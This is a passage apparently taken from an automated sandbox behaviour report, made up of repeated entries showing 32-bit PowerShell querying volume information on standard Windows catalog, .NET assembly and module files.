        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
